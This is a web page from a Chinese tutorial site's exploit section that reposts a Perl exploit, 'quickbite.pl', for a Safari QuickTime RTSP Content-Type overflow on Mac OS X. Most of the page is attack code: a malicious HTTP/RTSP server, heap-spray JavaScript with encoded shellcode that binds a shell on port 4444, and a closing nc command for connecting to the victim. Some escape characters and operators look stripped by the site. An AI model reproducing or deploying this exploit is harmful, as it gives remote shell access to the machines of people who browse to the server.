手机
当前位置:查字典教程网 >网络安全 >Exploit >Safari Quicktime
Safari Quicktime
摘要:#!/usr/bin/perl##quickbite.pl##SafariQuicktime

#!/usr/bin/perl

#

# quickbite.pl

#

# Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit

# for Mac OS X (Intel)

#

# Tested with OS X 10.4.

# On victim, browse to http://server:8080/

# Binds shell on port 4444.

#

# by krafty

#

# greets to sk, halvar, grugq, and all the ethnical hackers

# extra thanks to ddz for osx hackery

# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc

# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.

# milw0rm and packetstorm rule

# Bring back the days of technotronic and r00tshell! Freedom.

#

# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:

# "What's worse than biting into an apple and finding a worm?"

# "Finding half a worm".

use Socket;

use IO::Handle;

use constant MY_HTTP_PORT => 8080;

$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";

$buf = chr(0x11) x 6000;

# don't touch anything below this line

$html = <<ENDHTML;

<script>

var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");

var shellcode = unescape("$shellcode");

shellcode = prefix shellcode;

var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");

do {

spray = spray;

} while(spray.length < 0xc0000);

memory = new Array();

for(i = 0; i < 50; i )

memory[i] = spray shellcode;

var url = "rtsp://" location.host "/x.mp3";

document.write("<EMBED SRC='" url "' TYPE='video/quicktime' AUTOPLAY='true' />");

</script>

ENDHTML

$rtsp_body =

"v=0rn" .

"o=- 16689332712 1 IN IP4 0.0.0.0rn" .

"s=MPEG-1 or 2 Audiorn" .

"i=1.mp3rn" .

"t=0 0rn" .

"a=tool:hellorn" .

"a=type:broadcastrn" .

"a=control:*rn" .

"a=range:npt=0-213.077rn" .

"a=x-qt-text-nam:MPEG-1 or 2 Audiorn" .

"a=x-qt-text-inf:1.mp3rn" .

"m=audio 0 RTP/AVP 14rn" .

"c=IN IP4 0.0.0.0rn" .

"a=control:track1rn";

$content_length = length($rtsp_body);

$rtsp_header =

"RTSP/1.0 200 OKrn" .

"CSeq: 1rn" .

"Date: 0x00 :Prn" .

"Content-Base: rtsp://0.0.0.0/x.mp3/rn" .

"Content-Type: $bufrn" .

"Content-Length: $content_lengthrnrn";

$rtsp = $rtsp_header . $rtsp_body;

$http_header = "HTTP/1.1 200 OKnContent-type: text/htmlnn";

$| = 1;

my $port = MY_HTTP_PORT;

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";

setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";

my $my_addr = sockaddr_in($port,INADDR_ANY);

bind(SOCK,$my_addr) or die "bind() failed: $!";

listen(SOCK,SOMAXCONN) or die "listen() failed: $!";

warn "waiting for incoming connections on port $port...n";

$repeat = 1;

$victim = inet_aton("0.0.0.0");

while($repeat) {

next unless my $remote_addr = accept(SESSION,SOCK);

my ($port,$hisaddr) = sockaddr_in($remote_addr);

warn "Connection from [",inet_ntoa($hisaddr),",$port]n";

$victim = $hisaddr;

SESSION->autoflush(1);

$request = "";

while(<SESSION>) {

$request_line = $_;

$request .= $request_line;

chomp($request_line);

if($request_line =~ /DESCRIBE rtsp/) {

$repeat = 0;

}

$x = length($request_line);

if($x <= 1) {

last;

}

}

print STDERR $request;

if($repeat) {

print SESSION $http_header . $html;

}

else {

print SESSION $rtsp;

}

warn "Connection from [",inet_ntoa($hisaddr),",$port] finishedn";

close SESSION;

}

print "Connect to ".inet_ntoa($victim).":4444 after 5 secondsn";

print "nc -nvv ".inet_ntoa($victim)." 4444nEnjoy!n";

【Safari Quicktime】相关文章:

The Personal FTP Server 6.0f RETR Denial of Service Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

Maian Guestbook

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

上一篇: Ultrastats
精品推荐
分类导航